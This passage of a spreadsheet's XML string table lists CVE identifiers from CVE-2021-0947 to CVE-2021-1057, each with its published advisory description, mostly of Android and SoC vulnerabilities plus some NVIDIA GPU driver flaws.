    <t>The method PVRSRVBridgePMRPDumpSymbolicAddr allocates puiMemspaceNameInt on the heap, fills the contents of the buffer via PMR_PDumpSymbolicAddr, and then copies the buffer to userspace. The method PMR_PDumpSymbolicAddr may fail, and if it does the buffer will be left uninitialized and despite the error will still be copied to userspace. Kernel leak of uninitialized heap data with no privs required.Product: AndroidVersions: Android SoCAndroid ID: A-236846966</t>
  </si>
  <si>
    <t>CVE-2021-0947</t>
  </si>
  <si>
    <t>The method PVRSRVBridgeTLDiscoverStreams allocates puiStreamsInt on the heap, fills the contents of the buffer via TLServerDiscoverStreamsKM, and then copies the buffer to userspace. The method TLServerDiscoverStreamsKM may fail for several reasons including invalid sizes. If this method fails the buffer will be left uninitialized and despite the error will still be copied to userspace. Kernel leak of uninitialized heap data with no privs required.Product: AndroidVersions: Android SoCAndroid ID: A-236838960</t>
  </si>
  <si>
    <t>CVE-2021-0951</t>
  </si>
  <si>
    <t>In DevmemIntHeapAcquire of TBD, there is a possible arbitrary code execution due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-242345085</t>
  </si>
  <si>
    <t>CVE-2021-0952</t>
  </si>
  <si>
    <t>In doCropPhoto of PhotoSelectionHandler.java, there is a possible permission bypass due to a confused deputy. This could lead to local information disclosure of user's contacts with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-9Android ID: A-195748381</t>
  </si>
  <si>
    <t>CVE-2021-0953</t>
  </si>
  <si>
    <t>In setOnClickActivityIntent of SearchWidgetProvider.java, there is a possible way to access contacts and history bookmarks without permission due to an unsafe PendingIntent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-9Android ID: A-184046278</t>
  </si>
  <si>
    <t>CVE-2021-0954</t>
  </si>
  <si>
    <t>In ResolverActivity, there is a possible user interaction bypass due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11Android ID: A-143559931</t>
  </si>
  <si>
    <t>CVE-2021-0955</t>
  </si>
  <si>
    <t>In pf_write_buf of FuseDaemon.cpp, there is possible memory corruption due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-192085766</t>
  </si>
  <si>
    <t>CVE-2021-0956</t>
  </si>
  <si>
    <t>In NfcTag::discoverTechnologies (activation) of NfcTag.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote escalation of privilege with no additionalSystem execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12Android ID: A-189942532</t>
  </si>
  <si>
    <t>CVE-2021-0957</t>
  </si>
  <si>
    <t>In NotificationStackScrollLayout of NotificationStackScrollLayout.java, there is a possible way to bypass Factory Reset Protections. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-193149550</t>
  </si>
  <si>
    <t>CVE-2021-0958</t>
  </si>
  <si>
    <t>In update of km_compat.cpp, there is a possible loss of potentially sensitive data due to a logic error in the code. This could lead to local denial of service with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12Android ID: A-200041882</t>
  </si>
  <si>
    <t>CVE-2021-0959</t>
  </si>
  <si>
    <t>In jit_memory_region.cc, there is a possible bypass of memory restrictions due to a logic error in the code. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-200284993</t>
  </si>
  <si>
    <t>CVE-2021-0961</t>
  </si>
  <si>
    <t>In quota_proc_write of xt_quota2.c, there is a possible way to read kernel memory due to uninitialized data. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-196046570References: Upstream kernel</t>
  </si>
  <si>
    <t>CVE-2021-0963</t>
  </si>
  <si>
    <t>In onCreate of KeyChainActivity.java, there is a possible way to use an app certificate stored in keychain due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-9Android ID: A-199754277</t>
  </si>
  <si>
    <t>CVE-2021-0964</t>
  </si>
  <si>
    <t>In C2SoftMP3::process() of C2SoftMp3Dec.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-9Android ID: A-193363621</t>
  </si>
  <si>
    <t>CVE-2021-0965</t>
  </si>
  <si>
    <t>In AndroidManifest.xml of Settings, there is a possible pairing of a Bluetooth device without user's consent due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-9Android ID: A-194300867</t>
  </si>
  <si>
    <t>CVE-2021-0966</t>
  </si>
  <si>
    <t>In code generated by BuildParcelFields of generate_cpp.cpp, there is a possible way for a crafted parcelable to reveal uninitialized memory of a target process due to uninitialized data. This could lead to local information disclosure across Binder transactions with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12Android ID: A-198346478</t>
  </si>
  <si>
    <t>CVE-2021-0967</t>
  </si>
  <si>
    <t>In vorbis_book_decodev_set of codebook.c, there is a possible out of bounds write due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-9Android ID: A-199065614</t>
  </si>
  <si>
    <t>CVE-2021-0968</t>
  </si>
  <si>
    <t>In osi_malloc and osi_calloc of allocator.cc, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-9Android ID: A-197868577</t>
  </si>
  <si>
    <t>CVE-2021-0969</t>
  </si>
  <si>
    <t>In getTitle of AccessPoint.java, there is a possible unhandled exception due to a missing null check. This could lead to remote denial of service if a proximal Wi-Fi AP provides invalid information with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11Android ID: A-199922685</t>
  </si>
  <si>
    <t>CVE-2021-0970</t>
  </si>
  <si>
    <t>In createFromParcel of GpsNavigationMessage.java, there is a possible Parcel serialization/deserialization mismatch. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-9Android ID: A-196970023</t>
  </si>
  <si>
    <t>CVE-2021-0971</t>
  </si>
  <si>
    <t>In MPEG4Source::read of MPEG4Extractor.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-9Android ID: A-188893559</t>
  </si>
  <si>
    <t>CVE-2021-0973</t>
  </si>
  <si>
    <t>In isFileUri of UriUtil.java, there is a possible way to bypass ignoring file://URI attachment due to improper handling of case sensitivity. This could lead to local information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-197328178</t>
  </si>
  <si>
    <t>CVE-2021-0975</t>
  </si>
  <si>
    <t>In USB Manager, there is a possible way to determine whether an app is installed, without query permissions, due to side channel information disclosure. This could lead to local information disclosure of installed packages with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-180104273</t>
  </si>
  <si>
    <t>CVE-2021-0976</t>
  </si>
  <si>
    <t>In toBARK of floor0.c, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-199680600</t>
  </si>
  <si>
    <t>CVE-2021-0977</t>
  </si>
  <si>
    <t>In phNxpNHal_DtaUpdate of phNxpNciHal_dta.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-183487770</t>
  </si>
  <si>
    <t>CVE-2021-0978</t>
  </si>
  <si>
    <t>In getSerialForPackage of DeviceIdentifiersPolicyService.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92587406</t>
  </si>
  <si>
    <t>CVE-2021-0979</t>
  </si>
  <si>
    <t>In isRequestPinItemSupported of ShortcutService.java, there is a possible cross-user leak of packages in which the default launcher supports requests to create pinned shortcuts due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-191772737</t>
  </si>
  <si>
    <t>CVE-2021-0981</t>
  </si>
  <si>
    <t>In enqueueNotificationInternal of NotificationManagerService.java, there is a possible way to run a foreground service without showing a notification due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11Android ID: A-191981182</t>
  </si>
  <si>
    <t>CVE-2021-0982</t>
  </si>
  <si>
    <t>In getOrganizationNameForUser of DevicePolicyManagerService.java, there is a possible organization name disclosure due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-192368508</t>
  </si>
  <si>
    <t>CVE-2021-0983</t>
  </si>
  <si>
    <t>In createAdminSupportIntent of DevicePolicyManagerService.java, there is a possible disclosure of information about installed device/profile owner package name due to side channel information disclosure. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-192245204</t>
  </si>
  <si>
    <t>CVE-2021-0984</t>
  </si>
  <si>
    <t>In onNullBinding of ManagedServices.java, there is a possible permission bypass due to an incorrectly unbound service. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-192475653</t>
  </si>
  <si>
    <t>CVE-2021-0985</t>
  </si>
  <si>
    <t>In onReceive of AlertReceiver.java, there is a possible way to dismiss system dialog due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-190403923</t>
  </si>
  <si>
    <t>CVE-2021-0986</t>
  </si>
  <si>
    <t>In hasGrantedPolicy of DevicePolicyManagerService.java, there is a possible information disclosure about the device owner, profile owner, or device admin due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-192247339</t>
  </si>
  <si>
    <t>CVE-2021-0987</t>
  </si>
  <si>
    <t>In getNeighboringCellInfo of PhoneInterfaceManager.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90619791</t>
  </si>
  <si>
    <t>CVE-2021-0988</t>
  </si>
  <si>
    <t>In getLaunchedFromUid and getLaunchedFromPackage of ActivityClientController.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91954233</t>
  </si>
  <si>
    <t>CVE-2021-0989</t>
  </si>
  <si>
    <t>In hasManageOngoingCallsPermission of TelecomServiceImpl.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94105812</t>
  </si>
  <si>
    <t>CVE-2021-0990</t>
  </si>
  <si>
    <t>In getDeviceId of PhoneSubInfoController.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85591180</t>
  </si>
  <si>
    <t>CVE-2021-0991</t>
  </si>
  <si>
    <t>In OnMetadataChangedListener of AdvancedBluetoothDetailsHeaderController.java, there is a possible leak of Bluetooth MAC addresses due to log information disclosure. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-181588752</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N</t>
  </si>
  <si>
    <t>CVE-2021-0992</t>
  </si>
  <si>
    <t>In onCreate of PaymentDefaultDialog.java, there is a possible way to change a default payment app without user consent due to tapjack overlay. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-180104327</t>
  </si>
  <si>
    <t>CVE-2021-0993</t>
  </si>
  <si>
    <t>In getOffsetBeforeAfter of TextLine.java, there is a possible denial of service due to resource exhaustion. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-193849901</t>
  </si>
  <si>
    <t>CVE-2021-0994</t>
  </si>
  <si>
    <t>In requestRouteToHostAddress of ConnectivityService.java, there is a possible way to determine whether an app is installed, without query permissions, due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-193801134</t>
  </si>
  <si>
    <t>CVE-2021-0995</t>
  </si>
  <si>
    <t>In registerSuggestionConnectionStatusListener of WifiServiceImpl.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97536547</t>
  </si>
  <si>
    <t>CVE-2021-0996</t>
  </si>
  <si>
    <t>In nfaHciCallback of HciEventManager.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure over NFC with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-181346545</t>
  </si>
  <si>
    <t>CVE-2021-0997</t>
  </si>
  <si>
    <t>In handleUpdateNetworkState of GnssNetworkConnectivityHandler.java , there is a possible APN disclosure due to log information disclosure. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-191086488</t>
  </si>
  <si>
    <t>CVE-2021-0998</t>
  </si>
  <si>
    <t>In 'ih264e_find_bskip_params()' of ih264e_me.c, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-193442575</t>
  </si>
  <si>
    <t>CVE-2021-0999</t>
  </si>
  <si>
    <t>In the broadcast definition in AndroidManifest.xml, there is a possible way to set the A2DP bluetooth device connection state due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-196858999</t>
  </si>
  <si>
    <t>CVE-2021-1000</t>
  </si>
  <si>
    <t>In createBluetoothDeviceSlice of ConnectedDevicesSliceProvider.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-185190688</t>
  </si>
  <si>
    <t>CVE-2021-1001</t>
  </si>
  <si>
    <t>In PVInitVideoEncoder of mp4enc_api.cpp, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-190435883</t>
  </si>
  <si>
    <t>CVE-2021-1002</t>
  </si>
  <si>
    <t>In WT_Interpolate of eas_wtengine.c, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-194533433</t>
  </si>
  <si>
    <t>CVE-2021-1003</t>
  </si>
  <si>
    <t>In adjustStreamVolume of AudioService.java, there is a possible way for unprivileged app to change audio stream volume due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-189857506</t>
  </si>
  <si>
    <t>CVE-2021-1004</t>
  </si>
  <si>
    <t>In getConfiguredNetworks of WifiServiceImpl.java, there is a possible way to determine whether an app is installed, without query permissions, due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-197749180</t>
  </si>
  <si>
    <t>CVE-2021-1005</t>
  </si>
  <si>
    <t>In getDeviceIdWithFeature of PhoneInterfaceManager.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86530889</t>
  </si>
  <si>
    <t>CVE-2021-1006</t>
  </si>
  <si>
    <t>In several functions of DatabaseManager.java, there is a possible leak of Bluetooth MAC addresses due to log information disclosure. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-183961974</t>
  </si>
  <si>
    <t>CVE-2021-1007</t>
  </si>
  <si>
    <t>In btu_hcif_process_event of btu_hcif.cc, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-167759047</t>
  </si>
  <si>
    <t>CVE-2021-1008</t>
  </si>
  <si>
    <t>In addSubInfo of SubscriptionController.java, there is a possible way to force the user to make a factory reset due to a logic error in the code. This could lead to local denial of service with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-197327688</t>
  </si>
  <si>
    <t>CVE-2021-1009</t>
  </si>
  <si>
    <t>In setApplicationCategoryHint of PackageManagerService.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89858128</t>
  </si>
  <si>
    <t>CVE-2021-1010</t>
  </si>
  <si>
    <t>In getSigningKeySet of PackageManagerService.java, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-189857801</t>
  </si>
  <si>
    <t>CVE-2021-1011</t>
  </si>
  <si>
    <t>In setPackageStoppedState of PackageManagerService.java, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-188219307</t>
  </si>
  <si>
    <t>CVE-2021-1012</t>
  </si>
  <si>
    <t>In onResume of NotificationAccessDetails.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95412179</t>
  </si>
  <si>
    <t>CVE-2021-1013</t>
  </si>
  <si>
    <t>In checkExistsAndEnforceCannotModifyImmutablyRestrictedPermission of PermissionManagerService.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86404356</t>
  </si>
  <si>
    <t>CVE-2021-1014</t>
  </si>
  <si>
    <t>In getNetworkTypeForSubscriber of PhoneInterfaceManager.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86776740</t>
  </si>
  <si>
    <t>CVE-2021-1015</t>
  </si>
  <si>
    <t>In getMeidForSlot of PhoneInterfaceManager.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86530496</t>
  </si>
  <si>
    <t>CVE-2021-1016</t>
  </si>
  <si>
    <t>In onCreate of UsbPermissionActivity.java, there is a possible way to grant an app access to USB without informed user consent due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-183610267</t>
  </si>
  <si>
    <t>CVE-2021-1017</t>
  </si>
  <si>
    <t>In AdapterService and GattService definition of AndroidManifest.xml, there is a possible way to disable bluetooth connection due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-182583850</t>
  </si>
  <si>
    <t>CVE-2021-1018</t>
  </si>
  <si>
    <t>In adjustStreamVolume of AudioService.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94110891</t>
  </si>
  <si>
    <t>CVE-2021-1019</t>
  </si>
  <si>
    <t>In snoozeNotification of NotificationListenerService.java, there is a possible permission confusion due to a misleading user consent dialog. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-195031401</t>
  </si>
  <si>
    <t>CVE-2021-1020</t>
  </si>
  <si>
    <t>In snoozeNotification of NotificationListenerService.java, there is a possible way to disable notification for an arbitrary user due to improper input validation. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-195111725</t>
  </si>
  <si>
    <t>CVE-2021-1021</t>
  </si>
  <si>
    <t>In snoozeNotificationInt of NotificationManagerService.java, there is a possible way to disable notification for an arbitrary user due to improper input validation. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-195031703</t>
  </si>
  <si>
    <t>CVE-2021-1022</t>
  </si>
  <si>
    <t>In btif_in_hf_client_generic_evt of btif_hf_client.cc, there is a possible Bluetooth service crash due to a missing null check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-180420059</t>
  </si>
  <si>
    <t>CVE-2021-1023</t>
  </si>
  <si>
    <t>In onCreate of RequestIgnoreBatteryOptimizations.java, there is a possible way to determine whether an app is installed, without query permissions, due to side channel information disclosure. This could lead to local information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-195963373</t>
  </si>
  <si>
    <t>CVE-2021-1024</t>
  </si>
  <si>
    <t>In onEventReceived of EventResultPersister.java, there is a possible intent redirection due to a confused deputy. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-191283525</t>
  </si>
  <si>
    <t>CVE-2021-1025</t>
  </si>
  <si>
    <t>In hasNamedWallpaper of WallpaperManagerService.java, there is a possible way to determine whether an app is installed, without query permissions, due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-193800652</t>
  </si>
  <si>
    <t>CVE-2021-1026</t>
  </si>
  <si>
    <t>In startRanging of RttServiceImpl.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94798757</t>
  </si>
  <si>
    <t>CVE-2021-1027</t>
  </si>
  <si>
    <t>In setTransactionState of SurfaceFlinger, there is possible arbitrary code execution in a privileged process due to improper casting. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-193033243</t>
  </si>
  <si>
    <t>CVE-2021-1028</t>
  </si>
  <si>
    <t>In setClientStateLocked of SurfaceFlinger.cpp, there is a possible out of bounds write due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-193034683</t>
  </si>
  <si>
    <t>CVE-2021-1029</t>
  </si>
  <si>
    <t>In setClientStateLocked of SurfaceFlinger.cpp, there is a possible out of bounds write due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-193034677</t>
  </si>
  <si>
    <t>CVE-2021-1030</t>
  </si>
  <si>
    <t>In setNotificationsShownFromListener of NotificationManagerService.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94697001</t>
  </si>
  <si>
    <t>CVE-2021-1031</t>
  </si>
  <si>
    <t>In cancelNotificationsFromListener of NotificationManagerService.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94697004</t>
  </si>
  <si>
    <t>CVE-2021-1032</t>
  </si>
  <si>
    <t>In getMimeGroup of PackageManagerService.jav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Android ID: A-184745603</t>
  </si>
  <si>
    <t>CVE-2021-1033</t>
  </si>
  <si>
    <t>In createGeneralSlice of ConnectedDevicesSliceProvider.java.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-185247656</t>
  </si>
  <si>
    <t>CVE-2021-1034</t>
  </si>
  <si>
    <t>In getLine1NumberForDisplay of PhoneInterfaceManager.java, there is apossible way to determine whether an app is installed, without querypermissions due to a missing permission check. This could lead to localinformation disclosure with no additional execution privileges needed. Userinteraction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-193441322</t>
  </si>
  <si>
    <t>CVE-2021-1035</t>
  </si>
  <si>
    <t>In setLaunchIntent of BluetoothDevicePickerPreferenceController.java, there is a possible way to invoke an arbitrary broadcast receiver due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-12Android ID: A-195668284</t>
  </si>
  <si>
    <t>CVE-2021-1036</t>
  </si>
  <si>
    <t>In LocationSettingsActivity of AndroidManifest.xml, there is a possible EoP due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-9Android ID: A-182812255</t>
  </si>
  <si>
    <t>CVE-2021-1037</t>
  </si>
  <si>
    <t>The broadcast that DevicePickerFragment sends when a new device is paired doesn't have any permission checks, so any app can register to listen for it. This lets apps keep track of what devices are paired without requesting BLUETOOTH permissions.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-9Android ID: A-162951906</t>
  </si>
  <si>
    <t>CVE-2021-1038</t>
  </si>
  <si>
    <t>In UserDetailsActivity of AndroidManifest.xml, there is a possible DoS due to a tapjacking/overlay attack. This could lead to local denial of service with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-9Android ID: A-183411279</t>
  </si>
  <si>
    <t>CVE-2021-1039</t>
  </si>
  <si>
    <t>In NotificationAccessActivity of AndroidManifest.xml, there is a possible EoP due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-9Android ID: A-182808318</t>
  </si>
  <si>
    <t>CVE-2021-1040</t>
  </si>
  <si>
    <t>In onCreate of BluetoothPairingSelectionFragment.java, there is a possible EoP due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-9Android ID: A-182810085</t>
  </si>
  <si>
    <t>CVE-2021-1041</t>
  </si>
  <si>
    <t>In (TBD) of (TBD), there is a possible out of bounds read due to memory corruption. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-182950799References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-1042</t>
  </si>
  <si>
    <t>In dsi_panel_debugfs_read_cmdset of dsi_panel.c, there is a possible disclosure of freed kernel heap memory due to a use after free. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-187851056References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-1043</t>
  </si>
  <si>
    <t>In TBD of TBD, there is a possible downgrade attack due to under utilized anti-rollback protections. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-194697257References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-1044</t>
  </si>
  <si>
    <t>In eicOpsDecryptAes128Gcm of acropora/app/identity/identity_support.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-195570681References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-1045</t>
  </si>
  <si>
    <t>Product: AndroidVersions: Android kernelAndroid ID: A-195580473References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-1046</t>
  </si>
  <si>
    <t>In lwis_dpm_update_clock of lwis_device_dpm.c, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-195609074References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-1047</t>
  </si>
  <si>
    <t>In valid_ipc_dram_addr of cm_access_control.c, there is a possible out of bounds read due to an integer overflow. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-197966306References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-1048</t>
  </si>
  <si>
    <t>In ep_loop_check_proc of eventpoll.c, there is a possible way to corrupt memory due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-204573007References: Upstream kernel</t>
  </si>
  <si>
    <t>CVE-2021-1049</t>
  </si>
  <si>
    <t>Hacker one bug ID: 1343975Product: AndroidVersions: Android SoCAndroid ID: A-204256722</t>
  </si>
  <si>
    <t>CVE-2021-1050</t>
  </si>
  <si>
    <t>In MMU_UnmapPages of the PowerVR kernel driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-243825200</t>
  </si>
  <si>
    <t>CVE-2021-1051</t>
  </si>
  <si>
    <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape in which a local user can get elevated privileges to modify display configuration data, which may result in denial of service of the display.</t>
  </si>
  <si>
    <t>CVE-2021-1052</t>
  </si>
  <si>
    <t>NVIDIA GPU Display Driver for Windows and Linux, all versions, contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape or IOCTL in which user-mode clients can access legacy privileged APIs, which may lead to denial of service, escalation of privileges, and information disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-1053</t>
  </si>
  <si>
    <t>NVIDIA GPU Display Driver for Windows and Linux, all versions, contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape or IOCTL in which improper validation of a user pointer may lead to denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-1054</t>
  </si>
  <si>
    <t>NVIDIA GPU Display Driver for Windows, all versions, contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape in which the software does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action, which may lead to denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-1055</t>
  </si>
  <si>
    <t>NVIDIA GPU Display Driver for Windows, all versions, contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape in which improper access control may lead to denial of service and information disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-1056</t>
  </si>
  <si>
    <t>NVIDIA GPU Display Driver for Linux, all versions, contains a vulnerability in the kernel mode layer (nvidia.ko) in which it does not completely honor operating system file system permissions to provide GPU device-level isolation, which may lead to denial of service or information disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-1057</t>
  </si>
  <si>
